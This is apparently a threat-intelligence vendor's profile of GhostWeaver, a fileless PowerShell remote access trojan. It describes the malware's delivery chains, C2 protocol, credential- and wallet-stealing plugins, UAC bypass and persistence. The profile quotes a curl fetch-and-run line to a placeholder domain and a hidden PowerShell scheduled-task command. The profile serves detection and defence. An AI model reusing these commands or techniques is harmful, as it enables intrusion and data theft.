GhostWeaver is a fileless, in-memory PowerShell remote access trojan targeting Windows systems. It is principally deployed by MintsLoader in campaigns associated with TA582, also tracked as UNC4108, and has appeared downstream of SocGholish/FakeUpdates compromise chains. Delivery chains include phishing attachments, ClickFix-style social-engineering lures, and fake browser-update prompts on compromised websites; MintsLoader profiles hosts and may withhold GhostWeaver from sandbox-like environments.
GhostWeaver maintains encrypted command-and-control communications using a custom compressed JSON protocol and multiple domain-generation routines. It supports reflective loading of .NET plugins, including plugins for browser credential collection, web-form grabbing and injection, Outlook-data collection, and cryptocurrency-wallet theft. Its plugin mechanism can also redeploy MintsLoader, creating a reinfection and payload-delivery loop.
The RAT uses antivirus-aware persistence logic with multiple installation modes. Observed persistence includes a recurring hidden scheduled task that launches PowerShell, while its installer can use a CMSTPLUA COM-based UAC bypass after process masquerading. It also reduces forensic visibility by disabling Task Scheduler operational logging. GhostWeaver's in-memory execution, DGA-based infrastructure, anti-analysis gating, privilege-bypass behavior, and plugin architecture make it a flexible post-compromise backdoor.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
4 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
GhostWeaver is MintsLoader's primary payload across campaigns and is a PowerShell RAT that can redeploy MintsLoader through its sendPlugin capability.
GhostWeaver is MintsLoader's primary payload across campaigns and is a PowerShell RAT that can redeploy MintsLoader through its sendPlugin capability.
GhostWeaver is a fileless PowerShell RAT that maintains command-and-control (C2) over GZip-compressed JSON inside TLS 1.0 connections on port 25658. AV vendors detect it as Pantera.
GhostWeaver is a fileless PowerShell RAT (remote access trojan) that adapts its installation to whichever antivirus is running on the machine... It communicates over TLS on port 25658... It generates its own server addresses through four separate DGA routines...
23 distinct techniques documented for this family, organized by ATT&CK tactic.
Scheduled task: conhost --headless powershell -ep bypass Azure{FunctionName} every 3 min.
Obfuscation uses arithmetic character encoding where every string is constructed via math expressions without [char] casts.
PEB masquerade via VirtualProtectEx / WriteProcessMemory to impersonate explorer.exe.
"We deobfuscated the PowerShell source (855 strings across three obfuscation layers)"; "decoded the C2 wire protocol"
"OS Windows version string"; "Performance Win32_ComputerSystem.Domain"; "GPU check (Win32_VideoController)"; "CPU cache check (Win32_CacheMemory)"
"The wire format is a 4-byte little-endian length header followed by GZip-compressed JSON"
"GhostWeaver skips HTTP entirely. It communicates over raw TCP on port 25658, wrapped in TLS 1.0"
All paths converge on: curl -useb http://[domain]/1.php?s=[campaign_ID].
Four distinct DGA algorithms across kill chain stages.
31 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
14 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
An additional payload observed downstream of SocGholish-delivered loaders.
A PowerShell backdoor delivered downstream from SocGholish-associated loaders.
A PowerShell backdoor observed as a downstream payload in SocGholish infection chains.
A PowerShell backdoor that steals credentials and cryptocurrency wallet information from web forms.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.